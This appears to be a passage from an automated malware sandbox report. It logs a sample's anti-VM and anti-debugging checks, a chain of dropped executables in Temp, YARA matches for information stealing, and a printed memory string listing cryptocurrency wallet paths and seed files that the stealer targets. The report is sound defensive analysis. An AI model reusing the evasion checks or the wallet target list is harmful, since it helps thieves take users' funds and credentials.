                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: BAEBFIIE.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                        Source: explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0S;
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: xVBoxService.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: *Windows 11 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ,Windows 2016 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
                        Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: VBoxService.exe
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO
                        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: *Windows 10 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
                        Source: BAEBFIIE.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
                        Source: BAEBFIIE.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: VMWare
                        Source: BAEBFIIE.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: BAEBFIIE.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: BAEBFIIE.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: #Windows 11 Microsoft Hyper-V Server
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeCode function: 8_2_04C10EC9 Start: 04C10F5C End: 04C10EE58_2_04C10EC9
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_051404E7 Start: 0514052D End: 0514051E10_2_051404E7
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeCode function: 8_2_04C10D9B rdtsc 8_2_04C10D9B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA15FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6CA15FF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C9B3480
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DD643B mov eax, dword ptr fs:[00000030h]10_2_00DD643B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DDA1A2 mov eax, dword ptr fs:[00000030h]10_2_00DDA1A2
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C9EB66C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C9EB1F7
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe "C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9EB341 cpuid 0_2_6C9EB341
                        Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6C9B35A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601A10 GetUserNameA,12_2_7F601A10
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 10.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.HCGCBFHCFC.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.3863894754.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2659626810.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3262726628.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.4551252479.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.2280009907.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000003.4421982821.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.2619135843.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2321726856.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.3823052795.0000000005220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2322415423.00000000007C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.3222116129.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2370682465.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2329883407.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.4462261068.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: a62ee169b8.exe PID: 7292, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
